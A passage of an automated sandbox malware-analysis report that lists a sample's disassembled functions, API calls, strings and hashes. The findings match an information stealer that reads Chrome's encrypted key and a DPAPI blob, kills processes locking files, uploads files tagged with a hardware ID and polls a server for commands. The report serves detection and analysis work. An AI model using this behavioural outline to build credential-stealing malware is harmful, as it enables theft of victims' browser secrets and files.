String ID: Coult not set proxy blanket: E_INVALIDARG$Coult not set proxy blanket: Unknown Error$Error executing query: WBEM_E_ACCESS_DENIED$Error executing query: WBEM_E_FAILED$Error executing query: WBEM_E_INVALID_CLASS$Error executing query: WBEM_E_INVALID_PARAMETER$Error executing query: WBEM_E_OUT_OF_MEMORY$Error executing query: WBEM_E_SHUTTING_DOWN$Error executing query: WBEM_E_TRANSPORT_FAILURE$Error initializing IWbemServices: Unknown Error$Error initializing IWbemServices: WBEM_E_ACCESS_DENIED$Error initializing IWbemServices: WBEM_E_FAILED$Error initializing IWbemServices: WBEM_E_INVALID_NAMESPACE$Error initializing IWbemServices: WBEM_E_INVALID_PARAMETER$Error initializing IWbemServices: WBEM_E_LOCAL_CREDENTIALS$Error initializing IWbemServices: WBEM_E_OUT_OF_MEMORY$Error initializing IWbemServices: WBEM_E_TRANSPORT_FAILURE$NULL$\\.\root\
API String ID: 1341702900-3789978394
Opcode ID: e34f373b028820e99195682161fe667be26613c91f1ba4974a482da22dd93acf
Instruction ID: 28d5aa70c094ee4c0ad2f8b52048420dffdbffdefac941443d107dca50a61a05
Opcode Fuzzy Hash: e34f373b028820e99195682161fe667be26613c91f1ba4974a482da22dd93acf
Instruction Fuzzy Hash: 3E81F971941215EBEB21DF95DD90FEFBBB4BF20B10F20451EE4026B2A0DB749A44CBA0

Function 014BB680 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 415
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 014BB713
SafeArrayGetUBound.OLEAUT32(00000000,00000001,?), ref: 014BB722
SafeArrayGetElement.OLEAUT32(00000000,?,00000000), ref: 014BB742

Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE

Strings

Could not get property: WBEM_E_OUT_OF_MEMORY, xrefs: 014BBB34
Could not get name from SafeArray: E_OUTOFMEMORY, xrefs: 014BBA38
Could not get property: WBEM_E_FAILED, xrefs: 014BBA9E
Could not get properties: WBEM_E_INVALID_PARAMETER, xrefs: 014BB93D
Could not get properties: WBEM_E_OUT_OF_MEMORY, xrefs: 014BB970
Could not get property: Unknown Error, xrefs: 014BBB66
Could not get name from SafeArray: DISP_E_BADINDEX, xrefs: 014BBA6B
Could not get name from SafeArray: Unknown Error, xrefs: 014BB9D6
Could not get property: WBEM_E_NOT_FOUND, xrefs: 014BBB02
Could not get properties: WBEM_E_FAILED, xrefs: 014BB90E, 014BB9A3
Could not get property: WBEM_E_INVALID_PARAMETER, xrefs: 014BBAD0
Could not get name from SafeArray: E_INVALIDARG, xrefs: 014BBA05
Can't convert parameter: , xrefs: 014BBBDA

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ArraySafe$Bound$ElementExceptionRaise
String ID: Can't convert parameter: $Could not get name from SafeArray: DISP_E_BADINDEX$Could not get name from SafeArray: E_INVALIDARG$Could not get name from SafeArray: E_OUTOFMEMORY$Could not get name from SafeArray: Unknown Error$Could not get properties: WBEM_E_FAILED$Could not get properties: WBEM_E_INVALID_PARAMETER$Could not get properties: WBEM_E_OUT_OF_MEMORY$Could not get property: Unknown Error$Could not get property: WBEM_E_FAILED$Could not get property: WBEM_E_INVALID_PARAMETER$Could not get property: WBEM_E_NOT_FOUND$Could not get property: WBEM_E_OUT_OF_MEMORY
API String ID: 966256350-1455836236
Opcode ID: cb0edfde878b0dfb15c860524ea6127bb3a1b53c412d559ebe9319ffe8f2271f
Instruction ID: 9d4cc871c644aa4795eb1bbc4c8813762701551b676f7596611da817f390bcd7
Opcode Fuzzy Hash: cb0edfde878b0dfb15c860524ea6127bb3a1b53c412d559ebe9319ffe8f2271f
Instruction Fuzzy Hash: D6F1A331D40259AADF15EBA5CC95FDEBB78FF29300F50816EE401B7260DB74AA48CB61

Function 0141EB10 Relevance: 29.1, APIs: 8, Strings: 8, Instructions: 1057fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,\Temp\,?), ref: 0141F08C
PathFindFileNameA.KERNELBASE(?), ref: 0141F17E

Part of subcall function 01410730: FindFirstFileW.KERNELBASE(00000000,?,?,?,?,?,940E2C7A), ref: 014107F0

CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0141F394
GetFileSize.KERNEL32(00000000,00000000), ref: 0141F3AC
ReadFile.KERNELBASE(?,00000000,?,?,00000000), ref: 0141F3DD
CloseHandle.KERNEL32(?), ref: 0141F3E9
SetFileAttributesA.KERNELBASE(?,00000080), ref: 0141F832
DeleteFileA.KERNELBASE(?), ref: 0141F83E

Strings

sendfiles, xrefs: 0141F78A
invalid stoi argument, xrefs: 0141FB03
<AND>filename=, xrefs: 0141F48E
<AND>hwid=, xrefs: 0141F477
\Temp\, xrefs: 0141EFEF
stoi argument out of range, xrefs: 0141FAF9
application/octet-stream, xrefs: 0141F75E
<AND>file=, xrefs: 0141F4F9

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: File$AttributesFind$CloseCreateDeleteFirstHandleNamePathReadSize
String ID: <AND>file=$<AND>filename=$<AND>hwid=$\Temp\$application/octet-stream$invalid stoi argument$sendfiles$stoi argument out of range
API String ID: 1664396084-3162059244
Opcode ID: 40789e94fa82dd78387007d38c39384b63a7ddb52052c79cf3be37183fdbe581
Instruction ID: 3ef9aa3f1f94c6ef5670837fade3977e85eb38b22f2c5924c21f745af9865b29
Opcode Fuzzy Hash: 40789e94fa82dd78387007d38c39384b63a7ddb52052c79cf3be37183fdbe581
Instruction Fuzzy Hash: 40A2FF70D00259DFEB25CF68CD48BEDBBB1AF55304F20829DD408AB2A5DB755A89CF50

Function 01441C50 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 340
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 01441E62

Strings

winGetTempname5, xrefs: 01441A3C
f66f7a17b78ba617acde90fc810107f34f1a1f2e, xrefs: 01441F8B
etilqs_, xrefs: 014416AC, 014416BA, 01441A6D, 01441AA1, 01441C70
delayed %dms for lock/sharing conflict, xrefs: 01441EE6
winGetTempname1, xrefs: 014417DB
cannot open file at line %d of [%.10s], xrefs: 01441F95
os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 014417E7, 014418F5, 01441A48, 01441BD3
winGetTempname4, xrefs: 01441BC7
winGetTempname2, xrefs: 014418EA
winOpen, xrefs: 01441F12
psow, xrefs: 0144200C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: cannot open file at line %d of [%.10s]$delayed %dms for lock/sharing conflict$etilqs_$f66f7a17b78ba617acde90fc810107f34f1a1f2e$os_win.c:%d: (%lu) %s(%s) - %s$psow$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5$winOpen
API String ID: 823142352-1390497953
Opcode ID: 3902dd736ebf33273dcc263c507c5139de945c95b4815d350fe7655a80886667
Instruction ID: 0dee6c54e2517be0e41970cd97f7e2d066c16f9f56ba0d5dd2b98812742f2040
Opcode Fuzzy Hash: 3902dd736ebf33273dcc263c507c5139de945c95b4815d350fe7655a80886667
Instruction Fuzzy Hash: FBC1E2B1A043019BF7349F28D841B6BBBE1BF95714F14092EF995DB3A0D771E8858B82

Function 014104FA Relevance: 19.7, APIs: 13, Instructions: 173
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RmRegisterResources.RSTRTMGR(?,00000001,?), ref: 01410513
RmGetList.RSTRTMGR(?,?,0000000A,?,?), ref: 0141054D
CopyFileA.KERNEL32(?,?,00000000), ref: 01410587
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 014105B9
TerminateProcess.KERNEL32(00000000,00000000), ref: 014105C2
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 014105E0
GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 014105E8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 014105F7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0141060A
LockFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01410622
CopyFileA.KERNEL32(?,?,00000000), ref: 01410647
UnlockFile.KERNEL32(00000000,?,?,00000000,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 01410667
CloseHandle.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0141066E

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: File$CopyPointerProcess$CloseCreateErrorHandleLastListLockOpenRegisterResourcesTerminateUnlock
String ID:
API String ID: 115183127-0
Opcode ID: be0e997e2599c8df29d7a8bd55485d4866192188680760461a57c9399ac19e70
Instruction ID: b66979c3d13e85c4cb4fdef76e919e8f4cde99093116068ebb85f72d742b90c9
Opcode Fuzzy Hash: be0e997e2599c8df29d7a8bd55485d4866192188680760461a57c9399ac19e70
Instruction Fuzzy Hash: 96519C31702219AFEB218F64CD55BEE7B68BF4A300F54049AFA09AB694D7349AC4CF11

Function 0141E230 Relevance: 18.2, APIs: 1, Strings: 9, Instructions: 674
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

command, xrefs: 0141E51D, 0141E5D1
paths, xrefs: 0141E683, 0141E751
getcommands, xrefs: 0141E44A
&command=, xrefs: 0141E2AD
msg, xrefs: 0141E492
&hwid=, xrefs: 0141E293
files, xrefs: 0141E733
RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4, xrefs: 0141EA10, 0141EA15, 0141EA31, 0141EA4C, 0141EA53
application/x-www-form-urlencoded, xrefs: 0141E41E

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID:
String ID: &command=$&hwid=$RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4$application/x-www-form-urlencoded$command$files$getcommands$msg$paths
API String ID: 0-2067283383
Opcode ID: 8c8640b5e2fad51f6c77daa7a04a043b92f9a55d4df9fba237d2fb949aae50f5
Instruction ID: 0d6dbc036b4080a0d3649fe3e5e745e237638788276097268e32da6e4cee39ab
Opcode Fuzzy Hash: 8c8640b5e2fad51f6c77daa7a04a043b92f9a55d4df9fba237d2fb949aae50f5
Instruction Fuzzy Hash: 71425571E002189FEB25CF68CC44BAEBBB5AF65314F18419ED809B73A6D7749A84CF50

Function 01411550 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 188
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 01411598
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 014115BF
lstrcatA.KERNEL32(00000000,00000000), ref: 014115E5
CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 014115FB
GetFileSize.KERNEL32(00000000,00000000), ref: 0141160F
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 01411643
CloseHandle.KERNEL32(00000000), ref: 01411652
lstrcatA.KERNEL32(ek_detpyrc,00000000), ref: 0141172D
lstrlenA.KERNEL32(ek_detpyrc), ref: 01411734

Strings

":"yek_detpyrc, xrefs: 0141173A

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: File$FolderPathlstrcat$CloseCreateHandleReadSizelstrlen
String ID: ":"yek_detpyrc
API String ID: 4206993862-104021576
Opcode ID: 00f0495d1ab0d3016d14cd6293b787b26f376ff3ce6fedb72485610ab5b7d619
Instruction ID: 750bc2471d03b85d84359e507302f0be3aa813472298b36b47684a3f2cee7654
Opcode Fuzzy Hash: 00f0495d1ab0d3016d14cd6293b787b26f376ff3ce6fedb72485610ab5b7d619
Instruction Fuzzy Hash: 6B512A74E052406FEF32CBB89C88B6B7BE4AB05B18F0D455BE6185F2A7D77A84048701

Function 014BBC80 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 284
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 014BBCB7
CoCreateInstance.OLE32(01507140,00000000,00000001,01507130,00000000), ref: 014BBCE7
CoUninitialize.OLE32 ref: 014BBDA7

Strings

Error initializing IWbemLocator: REGDB_E_CLASSNOTREG, xrefs: 014BBEE7
Error initializing IWbemLocator: E_POINTER, xrefs: 014BBE19
Error initializing IWbemLocator: E_NOINTERFACE, xrefs: 014BBE49
The COM library is already initialized on this thread, xrefs: 014BBDEA
Error initializing IWbemLocator: Unknown Error, xrefs: 014BBEB5
Error initializing IWbemLocator: CLASS_E_NOAGGREGATION, xrefs: 014BBE7F

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: Error initializing IWbemLocator: CLASS_E_NOAGGREGATION$Error initializing IWbemLocator: E_NOINTERFACE$Error initializing IWbemLocator: E_POINTER$Error initializing IWbemLocator: REGDB_E_CLASSNOTREG$Error initializing IWbemLocator: Unknown Error$The COM library is already initialized on this thread
API String ID: 948891078-3632482448
Opcode ID: 0cefa8b0ecaf482a293a9d79ca5e6436e4bade0729827e911a3bd8191a9384e1
Instruction ID: 1d9754b35d76874de6cebe9f366ec4041f30e57e1d11323eafb7389c797e96b1
Opcode Fuzzy Hash: 0cefa8b0ecaf482a293a9d79ca5e6436e4bade0729827e911a3bd8191a9384e1
Instruction Fuzzy Hash: 70B18971A0021A9FDB14DF99C884BDEB7B4FF58310F10866EE945A73A0DB74A944CBA1

Function 014D9BA0 Relevance: 13.7, APIs: 9, Instructions: 154
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,014B98C5,014B98C7,00000000,00000000,940E2C7A,?,00000000,?,014DC200,015256A0,000000FE,?,014B98C5,?), ref: 014D9C29
MultiByteToWideChar.KERNEL32(00000000,00000000,014B98C5,?,00000000,00000000,?,?,?,?,?,014B98C5), ref: 014D9CA4
SysAllocString.OLEAUT32(00000000), ref: 014D9CAF
_com_issue_error.COMSUPP ref: 014D9CD8
_com_issue_error.COMSUPP ref: 014D9CE2
GetLastError.KERNEL32(80070057,940E2C7A,?,00000000,?,014DC200,015256A0,000000FE,?,014B98C5,?), ref: 014D9CE7
_com_issue_error.COMSUPP ref: 014D9CFA
GetLastError.KERNEL32(00000000,?,014B98C5,?), ref: 014D9D10
_com_issue_error.COMSUPP ref: 014D9D23

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: e8c4f2fab2f0227cea60a3e4a0654ed8c930128a4d37c5ed825daeac65aa65f0
Instruction ID: 16f94d19cf7bcdfcd73ba28957fac26d409cfce637ef337c633975a3579b7021
Opcode Fuzzy Hash: e8c4f2fab2f0227cea60a3e4a0654ed8c930128a4d37c5ed825daeac65aa65f0
Instruction Fuzzy Hash: C841C4B1A00206ABDF10DFA9D854BAFBBE8BF58A14F15422FF515EB390D7349404C7A4

Function 01410F54 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 318
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002710,?,00000030,00000001,0140DC10), ref: 01411169
WSACleanup.WS2_32 ref: 014112A2

Strings

Content-Type, xrefs: 0141100B
POST, xrefs: 0141108E
e_user, xrefs: 01410F83
idb=, xrefs: 01410F88

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CleanupSleep
String ID: Content-Type$POST$e_user$idb=
API String ID: 1660135218-2367417250
Opcode ID: 76c6f97d534da8ebd080743f91e2833b5937eaf24ca746b6526b204833a84d10
Instruction ID: 5ad6f95f5c1333e2b2559ffc52ae858626190f0376f2200e95d32e744db6b25c
Opcode Fuzzy Hash: 76c6f97d534da8ebd080743f91e2833b5937eaf24ca746b6526b204833a84d10
Instruction Fuzzy Hash: DDC124709001589BEB28DB38CC98BDDBF71AF65314F54829EE408A73E9DB348AC4CB51

Function 0140CB50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0140CB8A
select.WS2_32(00000000,00000001,00000001,00000000,00000000), ref: 0140CBE2
WSAGetLastError.WS2_32 ref: 0140CBF5
select.WS2_32(00000000,?,?,00000000,00000000), ref: 0140CC22

Strings

Request timed out, xrefs: 0140CC4F
Failed to select socket, xrefs: 0140CC70

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: select$ErrorLastUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: Failed to select socket$Request timed out
API String ID: 3946973679-3719334483
Opcode ID: 9b6aee14557eb94c51cc8c480efa4ce503e514681fed7d34b02216d22bf843fa
Instruction ID: da09b387757bf44b3ab04558a1556f51c6e2b87b063952e62b2aab1c8e77b68c
Opcode Fuzzy Hash: 9b6aee14557eb94c51cc8c480efa4ce503e514681fed7d34b02216d22bf843fa
Instruction Fuzzy Hash: 8431BB31900219DBDB26DB6ACCD1BEEB7B9BB59310F0047FFA525A71D0DA709E448B50

Function 01422E30 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 01422E88

Part of subcall function 014C6E99: __EH_prolog3.LIBCMT ref: 014C6EA0
Part of subcall function 014C6E99: std::_Lockit::_Lockit.LIBCPMT ref: 014C6EAB
Part of subcall function 014C6E99: std::locale::_Setgloballocale.LIBCPMT ref: 014C6EC6
Part of subcall function 014C6E99: std::_Lockit::~_Lockit.LIBCPMT ref: 014C6F1C

std::_Lockit::_Lockit.LIBCPMT ref: 01422EFC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01422F44
__Getcvt.LIBCPMT ref: 01422F50

Part of subcall function 01402350: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01402376
Part of subcall function 01402350: std::_Lockit::~_Lockit.LIBCPMT ref: 0140240A

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Locinfo::_Lockit::_Lockit::~_std::locale::_$GetcvtH_prolog3InitLocinfo_ctorLocinfo_dtorSetgloballocale
String ID:
API String ID: 307478067-0
Opcode ID: 71c506f0b992986d9606c5f321def0ace38921151192f9a7866a6704868dae3c
Instruction ID: df5c0d6281350138b8dc28fd72e13e5068474e879a439c5986897fe0ebcc3dbc
Opcode Fuzzy Hash: 71c506f0b992986d9606c5f321def0ace38921151192f9a7866a6704868dae3c
Instruction Fuzzy Hash: B041A9B0C00789DEDB11CFA9C94078EFBF4BF28704F10861ED458AB291E7B5A248CB91

Function 0143FB00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,?), ref: 0143FBEE

Strings

delayed %dms for lock/sharing conflict, xrefs: 0143FCA1
winRead, xrefs: 0143FC6C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict$winRead
API String ID: 2738559852-3590536915
Opcode ID: b6275f1d929e94382f3114d601076cedb30b232974c7a871b1dbdf13efed72ae
Instruction ID: e9c9970bffe506e0b1d13b502db4b28b368d59de3142ea35e82dff4842ca8253
Opcode Fuzzy Hash: b6275f1d929e94382f3114d601076cedb30b232974c7a871b1dbdf13efed72ae
Instruction Fuzzy Hash: 1051A172E001099BCB18CFA9D8909AEB7F5FF9C300F24412BE915E7360D635AD49CB91

Function 01422FA2 Relevance: 4.6, APIs: 3, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01422FB4
std::_Lockit::~_Lockit.LIBCPMT ref: 01422FD5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 01422FE4

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$AddfacLocimp::_Locimp_Lockit::_Lockit::~_std::locale::_
String ID:
API String ID: 4268195171-0
Opcode ID: 2f24c07e066c6166e523f64c18b81b4e135570d64172a87cf5ba830294bd8424
Instruction ID: 52c18b2a9d06a63472c2e2eadd3917b28103aad6e9a04daf0922d01d68b6fbf6
Opcode Fuzzy Hash: 2f24c07e066c6166e523f64c18b81b4e135570d64172a87cf5ba830294bd8424
Instruction Fuzzy Hash: 3431B7B1A006119FEB21DF59D494B6AB7F4FF64700F14002EE905CB364DB75E984CB90

Function 0141E900 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

_vcomp_fork.VCOMP140(00000001,00000004,014FB7D0,?,00000000,00000004,?), ref: 0141EAEC

Strings

RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4, xrefs: 0141EA10, 0141EA15, 0141EA31, 0141EA4C, 0141EA53

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: _vcomp_fork
String ID: RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACF+ZYf14V6SqBTyOdVwl05EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAONRhnO5POHCpsAqtC+Dv8sqIj6H9zbZteTFJry6MExQAAAAAOgAAAAAIAACAAAABmJ4vsREYnmENveyKxxWe1fNW+cA3BuVq/wjRFfn5aRjAAAABOK2yLuOkSHk+gPlo2ka+4
API String ID: 3592199487-3264951547
Opcode ID: 5ceeb7d88b3a0ae7e1211b93df762177d8d31909476853c748b37b6603f4dd9a
Instruction ID: 23e2602487a9fa204700db4937287bdf2120f172da5e29ac993c92e4489b4a8b
Opcode Fuzzy Hash: 5ceeb7d88b3a0ae7e1211b93df762177d8d31909476853c748b37b6603f4dd9a
Instruction Fuzzy Hash: 61518271E0021A9BDF14CFA9C851BAEBBF5FF58710F14412EE906B73A1D77599008BA0

Function 014D8ADA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 01401BFE

Strings

Google Chrome, xrefs: 01401BE3

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: Google Chrome
API String ID: 2659868963-3338836597
Opcode ID: 1bcfa254e849208117a06abe78489120d4f7050905ab9a25d02c8737a1c8f441
Instruction ID: ae399635034c9a3238e28e8e1761eea2f61d49a02a115982ab94be8283064ea2
Opcode Fuzzy Hash: 1bcfa254e849208117a06abe78489120d4f7050905ab9a25d02c8737a1c8f441
Instruction Fuzzy Hash: A6012B3941020F7BCF15ABDADC1485ABBECEF21650B50853BF604AF6A0FB70E5518391

Function 0140DCA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 0140DCE9

Strings

WSAStartup failed, xrefs: 0140DD80

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Startup
String ID: WSAStartup failed
API String ID: 724789610-207067101
Opcode ID: 8e5f9c1c57c26c9ac2266cb8345c358db5da62d8fac1a497fefebef912116d01
Instruction ID: 7397e9452c19ff2fb62cdbafa6eea9f4a56e338e38ecb024e70da2e497da4935
Opcode Fuzzy Hash: 8e5f9c1c57c26c9ac2266cb8345c358db5da62d8fac1a497fefebef912116d01
Instruction Fuzzy Hash: 43F09071940258AEE7229F66CC45FD6BBF8FB05B10F0002AAF8659A284EBB059048A91

Function 014B9860 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 014B98F2
SysFreeString.OLEAUT32(-00000001), ref: 014B9920

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: FreeString_com_issue_error
String ID:
API String ID: 709734423-0
Opcode ID: 50abb49e0021068046b14021452d8eb34c4a47b842a29967ba5e90b0b0afd2ba
Instruction ID: b41077c6042d7c4b32bd6d224cea92d19a89bf998b5ee511a10623ec87b04638
Opcode Fuzzy Hash: 50abb49e0021068046b14021452d8eb34c4a47b842a29967ba5e90b0b0afd2ba
Instruction Fuzzy Hash: E321D1B1900716ABE7309F59D800B97FBE8EF51B24F20462FE96497390E7B5A844C7E0

Function 014EC235 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,014F3D97,?,00000000,?,?,014F4038,?,00000007,?,?,014F452C,?,?), ref: 014EC24B
GetLastError.KERNEL32(?,?,014F3D97,?,00000000,?,?,014F4038,?,00000007,?,?,014F452C,?,?), ref: 014EC256

Memory Dump Source

